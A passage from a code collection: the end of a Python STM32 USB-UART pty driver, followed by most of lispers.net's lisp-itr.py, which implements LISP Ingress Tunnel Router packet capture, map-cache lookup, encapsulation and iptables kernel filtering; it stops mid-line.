child fd. os.fdopen(s).close() self._logger.debug('stm32 uart pty is %s' % self.get_pty()) self._rx_thread = threading.Thread(target=self.run_rx_thread, args=[]) self._rx_thread.daemon = True self._tx_thread = threading.Thread(target=self.run_tx_thread, args=[]) self._tx_thread.daemon = True self._tx_thread.start() self._rx_thread.start() self._logger.debug('stm32 rx and tx threads started.') def get_uart_props(self): """Get the uart's properties. Returns: dict where: baudrate: integer of uarts baudrate bits: integer, number of bits of data Can be 5|6|7|8 inclusive parity: integer, parity of 0-2 inclusive where: 0: no parity 1: odd parity 2: even parity sbits: integer, number of stop bits. Can be 0|1|2 inclusive where: 0: 1 stop bit 1: 1.5 stop bits 2: 2 stop bits """ self._logger.debug('') if not self._props: self._props = {'baudrate': 115200, 'bits': 8, 'parity': 0, 'sbits': 1} return self._props.copy() def set_uart_props(self, line_props): """Set the uart's properties. Note that Suart cannot set properties and will fail if the properties are not the default 115200,8n1. Args: line_props: dict where: baudrate: integer of uarts baudrate bits: integer, number of bits of data ( prior to stop bit) parity: integer, parity of 0-2 inclusive where 0: no parity 1: odd parity 2: even parity sbits: integer, number of stop bits. Can be 0|1|2 inclusive where: 0: 1 stop bit 1: 1.5 stop bits 2: 2 stop bits Raises: SuartError: If requested line properties are not possible. """ self._logger.debug('') curr_props = self.get_uart_props() for prop in line_props: if line_props[prop] != curr_props[prop]: if (prop == 'baudrate' and (line_props[prop] % self.USB_USART_BAUD_MULTIPLIER) == 0): self._susb.control(self.USB_USART_SET_BAUD, line_props[prop] / self.USB_USART_BAUD_MULTIPLIER) elif prop == 'parity' and line_props[prop] in [0, 1, 2]: self._susb.control(self.USB_USART_SET_PARITY, line_props[prop]) else: raise SuartError('Line property %s cannot be set from %s to %s' % (prop, curr_props[prop], line_props[prop])) self._props = line_props.copy() return True def get_pty(self): """Gets path to pty for communication to/from uart. Returns: String path to the pty connected to the uart """ self._logger.debug('') return self._ptyname def test(): format = '%(asctime)s - %(name)s - %(levelname)s' loglevel = logging.INFO if True: loglevel = logging.DEBUG format += ' - %(filename)s:%(lineno)d:%(funcName)s' format += ' - %(message)s' logging.basicConfig(level=loglevel, format=format) logger = logging.getLogger(os.path.basename(sys.argv[0])) logger.info('Start') sobj = Suart() sobj.run() logging.info('%s', sobj.get_pty()) # run() is a thread so just busy wait to mimic server while True: # ours sleeps to eleven! time.sleep(11) if __name__ == '__main__': try: test() except KeyboardInterrupt: sys.exit(0)
lisp-itr.py
# ----------------------------------------------------------------------------- # # Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ----------------------------------------------------------------------------- # # lisp-itr.py # # This file performs LISP Ingress Tunnel Router (ITR) functionality. # # ----------------------------------------------------------------------------- from future import standard_library standard_library.install_aliases() from builtins import str from builtins import range import lisp import lispconfig import socket import select import threading import time import os from subprocess import getoutput import struct #------------------------------------------------------------------------------ # # Global data structures relative to the lisp-itr process. # lisp_send_sockets = [None, None, None] lisp_ipc_listen_socket = None lisp_ipc_punt_socket = None lisp_ephem_listen_socket = None lisp_ephem_nat_socket = None lisp_rloc_probe_socket = None lisp_ephem_port = lisp.lisp_get_ephemeral_port() lisp_ephem_nat_port = lisp.lisp_get_ephemeral_port() lisp_raw_socket = None lisp_raw_v6_socket = None lisp_periodic_timer = None lisp_itr_info_timer = None # # This is for testing sending from one local EID-prefix to another EID-prefix # on the same system. Rather than natively forwarding a packet, the mapping # system is used. # lisp_xtr_loopback = False # # Used to start pcap threads concurrently. # lisp_pcap_lock = threading.Lock() #------------------------------------------------------------------------------ # # lisp_itr_show_command # # Display state in an ITR. # def lisp_itr_show_command(parameter): return(lispconfig.lisp_itr_rtr_show_command(parameter, "ITR", [])) #enddef # # lisp_itr_show_keys_command # # Call lispconfig.lisp_show_crypto_list(). # def lisp_itr_show_keys_command(parameter): return(lispconfig.lisp_show_crypto_list("ITR")) #enddef # # lisp_itr_show_rloc_probe_command # # Display RLOC-probe list state in an ITR. # def lisp_itr_show_rloc_probe_command(parameter): return(lispconfig.lisp_itr_rtr_show_rloc_probe_command("ITR")) #enddef # # lisp_itr_process_timer # # This is the ITR's 60-second periodic timer routine. We typically use it # to time-out map-cache entries. But the one case where we are acting as # a L2-overlay ITR, we will send Map-Requests to retrieve the broadcast # entry so we have the latest replication-list before we need it. # def lisp_itr_process_timer(lisp_sockets, lisp_ephem_port): lisp.lisp_set_exception() # # Remove nonce entries from crypto-list. # for keys in list(lisp.lisp_crypto_keys_by_nonce.values()): for key in keys: del(key) #endfor lisp.lisp_crypto_keys_by_nonce = {} # # If doing L2-overlays, get map-cache entry from (0000-0000-0000/0, # ffff-ffff-ffff/48). # if (lisp.lisp_l2_overlay): afi = lisp.LISP_AFI_MAC iid = lisp.lisp_default_iid s = lisp.lisp_address(afi, "0000-0000-0000", 0, iid) s.mask_len = 0 d = lisp.lisp_address(afi, "ffff-ffff-ffff", 48, iid) lisp.lisp_send_map_request(lisp_sockets, lisp_ephem_port, s, d, None) #endif # # Timeout Map-Cache entries. # lisp.lisp_timeout_map_cache(lisp.lisp_map_cache) # # Restart periodic timer. # lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer, [lisp_sockets, lisp_ephem_port]) lisp_periodic_timer.start() return #enddef # # lisp_itr_timeout_dynamic_eids # # Check to see if dyanmic-EIDs have stop sending data. If so, remove the # state and stop registering them. # def lisp_itr_timeout_dynamic_eids(lisp_socket): lisp.lisp_set_exception() now = lisp.lisp_get_timestamp() for db in lisp.lisp_db_list: if (db.dynamic_eid_configured() == False): continue delete_list = [] for dyn_eid in list(db.dynamic_eids.values()): ts = dyn_eid.last_packet if (ts == None): continue if (ts + dyn_eid.timeout > now): continue # # Check hardware if dyn-EID has had packets SENT to. We want the # opposite but this is all we get from Arista. # if (lisp.lisp_program_hardware): prefix = dyn_eid.dynamic_eid.print_prefix_no_iid() if (lisp.lisp_arista_is_alive(prefix)): lisp.lprint(("Hardware indicates dynamic-EID {} " + \ "still active").format(lisp.green(prefix, False))) continue #endif #endif # # Tell ETR process so it can register dynamic-EID. # eid_str = dyn_eid.dynamic_eid.print_address() ipc = "learn%{}%None".format(eid_str) ipc = lisp.lisp_command_ipc(ipc, "lisp-itr") lisp.lisp_ipc(ipc, lisp_socket, "lisp-etr") lisp.lprint("Dynamic-EID {}".format( \ lisp.bold(lisp.green(eid_str, False) + " activity timeout", False))) delete_list.append(eid_str) #endfor # # Remove the timed out entries from db.dynamic_eids{}. # for eid_str in delete_list: db.dynamic_eids.pop(eid_str) #endfor # # Restart periodic timer. # threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT, lisp_itr_timeout_dynamic_eids, [lisp_socket]).start() return #enddef # # lisp_get_active_interfaces # # Get interfaces that are plugged in. Including loopback interfaces. # # We need to test these 3 types of lines from "ifconfig" output: # # aten2 Link encap:Ethernet HWaddr 00:1F:A0:07:0C:04 # eth7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 # en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 # def lisp_get_active_interfaces(): # # Choose only actively connected physical interfaces. Plus loopback. This # is needed for a roaming MAC to do telemetry measurements and wants to # connect to an ethernet. Each dongle vendor comes in with a different # interface/device name. # if (lisp.lisp_is_macos()): lines = getoutput("netstat -rn | egrep default | egrep UGS") interfaces = ["lo0"] for line in lines.split("\n"): intf = line.split()[-1] interfaces.append(intf) #endfor return(interfaces) #endif # # Linux distributions have different ifconfig output format. # gs = "Link encap" interfaces = getoutput("ifconfig | egrep '{}'".format(gs)) if (interfaces == ""): gs = ": flags=" interfaces = getoutput("ifconfig | egrep '{}'".format(gs)) #endif interfaces = interfaces.split("\n") return_interfaces = [] for interface in interfaces: ifname = interface.split(gs)[0].replace(" ", "") return_interfaces.append(ifname) #endfor return(return_interfaces) #enddef # # lisp_itr_startup # # Intialize this LISP ITR process. This function returns no values. # def lisp_itr_startup(): global lisp_send_sockets global lisp_ipc_listen_socket global lisp_ipc_punt_socket global lisp_ephem_listen_socket global lisp_ephem_nat_socket global lisp_raw_socket, lisp_raw_v6_socket global lisp_rloc_probe_socket lisp.lisp_i_am("itr") lisp.lisp_set_exception() lisp.lisp_print_banner("ITR starting up") # # Get local address for source RLOC for encapsulation. # lisp.lisp_get_local_interfaces() lisp.lisp_get_local_macs() if (lisp.lisp_get_local_addresses() == False): return(False) # # Open send socket. # lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4) lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6) lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-itr") lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr") lisp_send_sockets[2] = lisp_ipc_listen_socket address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0" lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address, str(lisp_ephem_port)) # # Set multicsat TTL to LISP_RLOC_PROBE_TTL so we can send RLOC-probes # to multicast RLOCs. # try: s = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4) ttl = lisp.LISP_RLOC_PROBE_TTL s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl) lisp_rloc_probe_socket = s except socket.error as e: lisp.lprint("socket.setsockopt() failed for RLOC-probe ttl: {}". \ format(e)) #endtry # # Used on for listening for Info-Replies for NAT-traversal support. # lisp_ephem_nat_socket = lisp.lisp_open_listen_socket("0.0.0.0", str(lisp_ephem_nat_port)) # # Open up raw socket so we can send with IP headers after decapsulation. # lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1) if (lisp.lisp_is_raspbian() == False): lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_UDP) #endif # # This is used by the ITR to send RTR status change information to the # ETR. Since RLOC-probing runs inside the lisp library, when state changes # occur, an IPC will have to be sent from the timer thread. This is the # only use-case for lisp.lisp_ipc_socket. # lisp.lisp_ipc_socket = lisp_ipc_listen_socket # # Start map-cache timeout timer. # threading.Thread(target=lisp_itr_get_capture_info).start() # # Load map-cache from checkpoint file before we start writing to it. # lisp.lisp_load_checkpoint() # # Should we load-split pings? # lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None) # # Start map-cache timeout timer. # lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer, [lisp_send_sockets, lisp_ephem_port]) lisp_periodic_timer.start() # # Start dynamic-EID timeout timer. # threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT, lisp_itr_timeout_dynamic_eids, [lisp_ipc_listen_socket]).start() return(True) #enddef # # lisp_itr_count_eid_prefixes # # Cound the number of "prefix" sub-commands inside of each "lisp database- # mapping" command. # def lisp_itr_count_eid_prefixes(): f = open("./lisp.config", "r") within = False count = 0 for line in f: if (line == "lisp database-mapping {\n"): within = True if (line == "}\n"): within = False if (within == False): continue if (line[0] == " " and line.find("prefix {") != -1): count += 1 #endif f.close() return(count) #enddef # # lisp_itr_get_local_eid_prefixes # # Check the number of "lisp database-mapping" commands we will process. Wait # for them to be processed and only return when all are processed. # # Return array of static EID-prefixes and an array of dynamic EID-prefixes. # def lisp_itr_get_local_eid_prefixes(): # # Count the number of "prefix" sub-commands within a "lisp database- # mapping" command clause in the lisp.config file. # count = lisp_itr_count_eid_prefixes() # # Does user want us to wait longer than a second to check to see if # commands are done. If the CPU is going to be busy during startup, the # wait-time should be made longer.. # wait_time = os.getenv("LISP_ITR_WAIT_TIME") wait_time = 1 if (wait_time == None) else int(wait_time) # # Wait for database-mapping commands to execute. We need to retrieve # EID-prefixes we need to listen on. # while (count != len(lisp.lisp_db_list)): lisp.lprint(("Waiting {} second(s) for {} database-mapping EID-" + \ "prefixes, {} processed so far ...").format(wait_time, count, len(lisp.lisp_db_list))) time.sleep(wait_time) #endwhile # # Return each IPv4, IPv6, or MAC EIDs. These are the ones we need to # pass to pcap. # sources = [] dyn_eids = [] for db in lisp.lisp_db_list: if (db.eid.is_ipv4() or db.eid.is_ipv6() or db.eid.is_mac()): eid_str = db.eid.print_prefix_no_iid() if (db.dynamic_eid_configured()): dyn_eids.append(eid_str) sources.append(eid_str) #endif #endfor return(sources, dyn_eids) #enddef # # lisp_itr_get_capture_info # # Thead to wait for database-mapping commands to finish processing so we can # get local EID-prefixes to be source filters for packet capture. # def lisp_itr_get_capture_info(): global lisp_pcap_lock lisp.lisp_set_exception() # # Wait for database-mapping commands to execute. We need to retrieve # EID-prefixes we need to listen on. # sources, dyn_eids = lisp_itr_get_local_eid_prefixes() # # If "ipc-data-plane = yes" is configured, we do not need to do any # data-plane forwarding. There is another module running with the # lispers.net control-plane that is doing data-plane forwarding. We'll # get punts via the lispers.net-itr named socket. But we do have to # packet capture RLOC-probe replies. Also capture multicast Map-Register # messages for LISP-Decent. # cp_pfilter = None if (lisp.lisp_ipc_data_plane): lisp.lprint(lisp.bold("Data-plane packet capture disabled", False)) cp_pfilter = "(udp src port 4342 and ip[28] == 0x28)" + \ " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)" lisp.lprint("Control-plane capture: '{}'".format(cp_pfilter)) else: lisp.lprint("Capturing packets for source-EIDs {}".format( \ lisp.green(str(sources), False))) #endif if (lisp.lisp_pitr): lisp.lprint("Configured for PITR functionality") # # We want the kernel to handle any packets with source AND destination # that matches any EID-prefixes for the site. Any other case, we want # the pcap filters to get the packet to this lisp-itr process. # l2_overlay = lisp.lisp_l2_overlay if (l2_overlay == False): if (lisp.lisp_is_linux()): lisp_itr_kernel_filter(sources, dyn_eids) #endif # # Build packet capture filter so we get packets for configured source EID- # prefixes. # if (cp_pfilter == None): if (lisp.lisp_pitr): pfilter = lisp_itr_build_pcap_filter(sources, [], False, True) else: pfilter = lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay, False) #endif else: pfilter = cp_pfilter #endif # # User can select which interfaces to pcap on. # interfaces = lisp_get_active_interfaces() pcap_list = os.getenv("LISP_PCAP_LIST") lisp.lprint("User pcap-list: {}, active-interfaces: {}".format(pcap_list, interfaces)) if (pcap_list == None): us = "" rloc_interfaces = [] else: eid_interfaces = list(set(pcap_list.split()) & set(interfaces)) rloc_interfaces = list(set(pcap_list.split()) ^ set(interfaces)) us = "user-selected " interfaces = eid_interfaces #endif # # Start a pcap thread so we can receive packets from applications on this # system. But make sure the device is up on A10 devices. If ethernet MAC # capturing, do not listen on non ethernet interfaces. # mac_capturing = (pfilter.find("ether host") != -1) for device in interfaces: if (device in ["lo", "lispers.net"] and mac_capturing): lisp.lprint(("Capturing suppressed on interface {}, " + \ "MAC filters configured").format(device)) continue #endif args = [device, pfilter, lisp_pcap_lock] lisp.lprint("Capturing packets on {}interface {}".format(us, device)) threading.Thread(target=lisp_itr_pcap_thread, args=args).start() #endfor if (cp_pfilter): return # # Start a pcap thread so we can receive RLOC-probe Map-Replies packets on # RLOC interfaces. This is only called when LISP_PCAP_LIST is set. # probe_pfilter = "(udp src port 4342 and ip[28] == 0x28)" for device in rloc_interfaces: args = [device, probe_pfilter, lisp_pcap_lock] lisp.lprint("Capture RLOC-probe replies on RLOC interface {}".format( \ device)) threading.Thread(target=lisp_itr_pcap_thread, args=args).start() #endfor return #enddef # # lisp_itr_shutdown # # Shut down this process. # def lisp_itr_shutdown(): # # Cancel periodic Info timer threads. # if (lisp_itr_info_timer): lisp_itr_info_timer.cancel() # # Close sockets. # lisp.lisp_close_socket(lisp_send_sockets[0], "") lisp.lisp_close_socket(lisp_send_sockets[1], "") lisp.lisp_close_socket(lisp_ephem_listen_socket, "") lisp.lisp_close_socket(lisp_rloc_probe_socket, "") lisp.lisp_close_socket(lisp_ephem_nat_socket, "") lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-itr") lisp.lisp_close_socket(lisp_ipc_punt_socket, "lispers.net-itr") return #enddef # # lisp_itr_data_plane # # Do map-cache lookup and encapsulate packet. # def lisp_itr_data_plane(packet, device, input_interface, macs, my_sa): global lisp_send_sockets global lisp_ephem_port global lisp_raw_socket, lisp_raw_v6_socket global lisp_ipc_listen_socket # # Check RLOC-probe Map-Reply. We need to grab the TTL from IP header. # orig_packet = packet packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 1) if (orig_packet != packet): if (source == None): return lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl) return #endif packet = lisp.lisp_packet(packet) if (packet.decode(False, None, None) == None): return # # For locally source packets from this system, the MAC address may # be the default router. Check source to see if assigned to this system, # and if so, accept on interface "device". # if (my_sa): input_interface = device # # Get instance-ID for incoming interface. # source_eid = packet.inner_source iid = lisp.lisp_get_interface_instance_id(input_interface, source_eid) packet.inner_dest.instance_id = iid packet.inner_source.instance_id = iid # # Print some useful header fields and strip outer headers.. # if (macs != ""): macs = ", MACs: " + macs + "," packet.print_packet("Receive {}{}".format(device, macs), False) # # Drop packet if input interface not found based on MAC address used. # if (device != input_interface and device != "lispers.net"): lisp.dprint("Not our MAC address on interface {}, pcap interface {}". \ format(input_interface, device)) return #endif lisp_decent = lisp.lisp_decent_push_configured if (lisp_decent): multicast = packet.inner_dest.is_multicast_address() local = packet.inner_source.is_local() lisp_decent = (local and multicast) #endif if (lisp_decent == False): # # Only forward packets from source-EIDs. # db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False) if (db == None): lisp.dprint("Packet received from non-EID source") return #endif # # Check to see if we are doing dynamic-EID discovery. # if (db.dynamic_eid_configured()): i = lisp.lisp_allow_dynamic_eid(input_interface, packet.inner_source) if (i): lisp.lisp_itr_discover_eid(db, packet.inner_source, input_interface, i, lisp_ipc_listen_socket) else: e = lisp.green(packet.inner_source.print_address(), False) lisp.dprint("Disallow dynamic-EID {} on interface {}".format(e, input_interface)) return #endif #endif if (packet.inner_source.is_local() and packet.udp_dport == lisp.LISP_CTRL_PORT): return #endif # # Do input processing for currently supported packet types.. # igmp = False if (packet.inner_version == 4): igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet) if (packet.packet == None): return packet.inner_ttl -= 1 elif (packet.inner_version == 6): packet.packet = lisp.lisp_ipv6_input(packet) if (packet.packet == None): return packet.inner_ttl -= 1 else: packet.packet = lisp.lisp_mac_input(packet.packet) if (packet.packet == None): return packet.encap_port = lisp.LISP_L2_DATA_PORT #endif # # First check if destination is to any local EID-prefixes from database- # mapping commands. In this case, we need to natively forward. # if (lisp_xtr_loopback == False): db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False) if (db and db.dynamic_eid_configured == False): lisp.dprint(("Packet destined to local EID-prefix {}, " + \ "natively forwarding").format(db.print_eid_tuple())) packet.send_packet(lisp_raw_socket, packet.inner_dest) return #endif #endif # # Do map-cache lookup. # mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest) if (mc): mc.add_recent_source(packet.inner_source) # # If "secondary-iid" is configured, we want to check the secondary # map-cache if a lookup miss occured in the default IID for this source # EID-prefix. If destination EID found in secondary map-cache, use it. # Otherwise, send Map-Request for EID in default IID. # secondary_iid = db.secondary_iid if (db != None) else None if (secondary_iid and mc and mc.action == lisp.LISP_NATIVE_FORWARD_ACTION): dest_eid = packet.inner_dest dest_eid.instance_id = secondary_iid mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid) if (mc): mc.add_recent_source(packet.inner_source) #endif # # Map-cache lookup miss. # if (mc == None or lisp.lisp_mr_or_pubsub(mc.action)): if (lisp.lisp_rate_limit_map_request(packet.inner_dest)): return pubsub = (mc and mc.action == lisp.LISP_SEND_PUBSUB_ACTION) lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port, packet.inner_source, packet.inner_dest, None, pubsub) if (packet.is_trace()): lisp.lisp_trace_append(packet, reason="map-cache miss") #endif return #endif # # Send Map-Request to see if there is a RLOC change or to refresh an # entry that is about to time out. # if (mc and mc.is_active() and mc.has_ttl_elapsed()): if (lisp.lisp_rate_limit_map_request(packet.inner_dest) == False): lisp.lprint("Refresh map-cache entry {}".format( \ lisp.green(mc.print_eid_tuple(), False))) lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port, packet.inner_source, packet.inner_dest, None) #endif #endif # # Update stats for entry. Stats per RLOC is done in lisp_mapping.select_ # rloc(). # mc.last_refresh_time = time.time() mc.stats.increment(len(packet.packet)) # # Encapsulate, native forward, or encapsulate-and-replciate packet. # dest_rloc, dest_port, nonce, action, rle, rloc_entry = \ mc.select_rloc(packet, lisp_ipc_listen_socket) if (dest_rloc == None and rle == None): if (action == lisp.LISP_NATIVE_FORWARD_ACTION): lisp.dprint("Natively forwarding") packet.send_packet(lisp_raw_socket, packet.inner_dest) if (packet.is_trace()): lisp.lisp_trace_append(packet, reason="not an EID") #endif return #endif r = "No reachable RLOCs found" lisp.dprint(r) if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r) return #endif if (dest_rloc and dest_rloc.is_null()): r = "Drop action RLOC found" lisp.dprint(r) if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r) return #endif # # Setup outer header for either unicast or multicast transmission.. # packet.outer_tos = packet.inner_tos packet.outer_ttl = 32 if (igmp) else packet.inner_ttl # # Do unicast encapsulation. # if (dest_rloc): packet.outer_dest.copy_address(dest_rloc) version = packet.outer_dest.afi_to_version() packet.outer_version = version source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \ lisp.lisp_myrlocs[1] packet.outer_source.copy_address(source_rloc) if (packet.is_trace()): if (lisp.lisp_trace_append(packet, rloc_entry=rloc_entry) \ == False): return #endif # # Encode new LISP, UDP, and outer header. # if (packet.encode(nonce) == None): return if (len(packet.packet) <= 1500): packet.print_packet("Send", True) # # Send out on raw socket. # raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket packet.send_packet(raw_socket, packet.outer_dest) elif (rle): # # Do replication of RLE is returned. Since we are an ITR, replicate to # level-0 RTRs (or ETRs) only (or first-level boxes only).. # level = rle.rle_nodes[0].level orig_len = len(packet.packet) for node in rle.rle_forwarding_list: if (node.level != level): return packet.outer_dest.copy_address(node.address) if (lisp_decent): packet.inner_dest.instance_id = 0xffffff version = packet.outer_dest.afi_to_version() packet.outer_version = version source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \ lisp.lisp_myrlocs[1] packet.outer_source.copy_address(source_rloc) if (packet.is_trace()): if (lisp.lisp_trace_append(packet) == False): return #endif if (packet.encode(None) == None): return # # Replicate out on raw socket. # packet.print_packet("Replicate-to-L{}".format(node.level), True) packet.send_packet(lisp_raw_socket, packet.outer_dest) # # We need to strip the encapsulation header so we can add a new # one for the next replication. # strip_len = len(packet.packet) - orig_len packet.packet = packet.packet[strip_len::] #endfor #endif # # Don't need packet structure anymore. # del(packet) return #enddef # # lisp_itr_pcap_process_packet # # Receive LISP encapsulated packet from pcap.loop(). # def lisp_itr_pcap_process_packet(device, not_used, packet): offset = 4 if device == "lo0" else 0 if device == "lispers.net" else 14 if (lisp.lisp_frame_logging): title = lisp.bold("Received frame on interface '{}'".format(device), False) frame = lisp.lisp_format_packet(packet[0:64]) lisp.lprint("{}: {}".format(title, frame)) #endif # # Get input interface based on source MAC address. # macs = "" my_sa = False interface = device if (offset == 14): interfaces, sa, da, my_sa = lisp.lisp_get_input_interface(packet) interface = device if (device in interfaces) else interfaces[0] macs = lisp.lisp_format_macs(sa, da) if (interface.find("vlan") != -1): offset +=4 # # If destination MAC address is multicast, set my_sa. Examine low-order # bit of first byte by grabbing the second nibble and testing low-order # bit after converting to integer. # if (int(da[1], 16) & 1): my_sa = True #endif # # Check for VLAN encapsulation. # if (offset != 0): ethertype = struct.unpack("H", packet[offset-2:offset])[0] ethertype = socket.ntohs(ethertype) if (ethertype == 0x8100): vlan = struct.unpack("I", packet[offset:offset+4])[0] vlan = socket.ntohl(vlan) interface = "vlan" + str(vlan >> 16) offset += 4 elif (ethertype == 0x806): lisp.dprint("Dropping ARP packets, host should have default route") return #endif #endif if (lisp.lisp_l2_overlay): offset = 0 lisp_itr_data_plane(packet[offset::], device, interface, macs, my_sa) return #enddef # # lisp_itr_kernel_filter # # Supplied 'sources' array are the EID-prefixes we want the kernel to drop # packets for. We will use iptables for Linux and ipfw for MacOS. # # We need this address combination support (notation S -> D): # # site-EID -> remote-EID processed by ITR # site-EID -> non-EID processed by ITR # site-EID -> site-EID processed by kernel # non-EID -> non-EID processed by kernel # non-EID -> remote-EID processed by kernel # non-EID -> site-EID processed by kernel # # The pcap filters reflect the ITR processing combos and can be found in # lisp_itr_build_pcap_filter(). This routine programs iptables to do the # kernel processing combos. # # (1) iptables -t raw -A lisp -j ACCEPT -d <special-addresses> # (2) iptables -t raw -A lisp -j ACCEPT -d <local-address> ... # (3) iptables -t raw -A lisp -j ACCEPT -s <site-eid> -d <site-eid> ... # (4) iptables -t raw -A lisp -j DROP -s <site-eid> ... # # (1) and (2), we want kernel to route packets. This allows loopback and # multicast to be processed by kernel. # # For (3), we want the kernel to do local routing of packets inside of a site # in this ITR. # # For (4), we want kernel to not touch any packets sourced from locally # configured EIDs. That is each EID-prefix from a "lisp database-mapping" # command. Because those EID-prefixes are pcap'ed and process by the lisp-itr # process. # def lisp_itr_kernel_filter(sources, dyn_eids): if (os.getenv("LISP_NO_IPTABLES") != None): lisp.lprint("User selected to suppress installing iptables rules") return #endif os.system("sudo iptables -t raw -N lisp") os.system("sudo iptables -t raw -A PREROUTING -j lisp") os.system("sudo ip6tables -t raw -N lisp") os.system("sudo ip6tables -t raw -A PREROUTING -j lisp") # # Have kernel process packets for local addresses when sourced from site # EIDs. We do not want the lisp-itr process to process such packets. # We want the kernel to deliver packets to and from local applications. # And we want the kernel to forward decapsulated packets out interfaces # leading the EIDs. # add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}" addr_set = ["127.0.0.1", "::1", "224.0.0.0/4 -p igmp", "ff00::/8", "fe80::/16"] addr_set += sources + lisp.lisp_get_all_addresses() for addr in addr_set: if (lisp.lisp_is_mac_string(addr)): continue six = "" if addr.find(":") == -1 else "6" os.system(add.format(six, addr)) #endfor # # When source and destination addresses are EIDs for this LISP site, # we want the kernel to do local routing. But as a PITR, we don't want # the kernel to route everything (EID-prefix 0.0.0.0/0) or we can't have # this process encapsulate for any source address to a destination EID. # if (lisp.lisp_pitr == False): add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}" check = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}" for source in sources: if (lisp.lisp_is_mac_string(source)): continue if (source in dyn_eids): continue six = "" if source.find(":") == -1 else "6" for s in sources: if (lisp.lisp_is_mac_string(s)): continue if (s in dyn_eids): continue if (s.find(".") != -1 and source.find(".") == -1): continue if (s.find(":") != -1 and source.find(":") == -1): continue if (getoutput(check.format(six, source, s)) == ""): continue #endif os.system(add.format(six, source, s)) #endfor #endfor #endif # # Now put in drop rules for each "lisp database-mapping" EID-prefix. # drop = "sudo ip{}tables -t raw -A lisp -j DROP -s {}" for source in sources: if (lisp.lisp_is_mac_string(source)): continue six = "" if source.find(":") == -1 else "6" os.system(drop.format(six, source)) #endif # # Print out rules we just configured. # rules = getoutput("sudo iptables -t raw -S lisp").split("\n") rules += getoutput("sudo ip6tables -t raw -S lisp").split("\n") lisp.lprint("Using kernel filters: {}".format(rules)) # # Check if we need to put in a iptables rule workaround for the virtio TCP # checksum corruption problem for KVM guest OSes. Check environmnt # variable LISP_VIRTIO_BUG. # # Note a debian host system that runs docker will need the following # command so ip6tables works inside of the docker container: # # sudo modprobe ip6table_filter # if (os.getenv("LISP_VIRTIO_BUG") != None): c = ("sudo iptables -A POSTROUTING -t mangle -p tcp -j " + \ "CHECKSUM --checksum-fill; ") c += ("sudo iptables -A POSTROUTING -t mangle -p udp -j " + \ "CHECKSUM --checksum-fill; ") c += ("sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + \ "CHECKSUM --checksum-fill; ") c += ("sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + \ "CHECKSUM --checksum-fill") os.system(c) virtio = lisp.bold("virtio", False) lisp.lprint("{} bug workaround, configure '{}'".format(virtio, c)) #endif return #enddef # # lisp_itr_build_pcap_filter # # Build pcap filter and return string to caller. # def lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay, pitr): if (l2_overlay): pfilter = "ether[6:4] >= 0 and ether[10:2] >= 0" lisp.lprint("Using pcap filter: '{}'".format(pfilter)) return(pfilter) #endif ether_pfilter = "(not ether proto 0x806)" probe_pfilter = " or (udp src port 4342 and ip[28] == 0x28)" decent_pfilter = \ " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)" src_pfilter = "" dst_pfilter = "" for source in sources: insert_source = source if (lisp.lisp_is_mac_string(source)): insert_source = source.split("/")[0] insert_source = insert_source.replace("-", "") mac_str = [] for i in range(0, 12, 2): mac_str.append(insert_source[i:i+2]) insert_source = "ether host " + ":".join(mac_str) #endif src_pfilter += "{}".format(insert_source) if (source not in dyn_eids): dst_pfilter += "{}".format(insert_source) if (sources[-1] == source): break src_pfilter += " or " if (source not in dyn_eids): dst_pfilter += " or " #endfor if (dst_pfilter[-4::] == " or "): dst_pfilter = 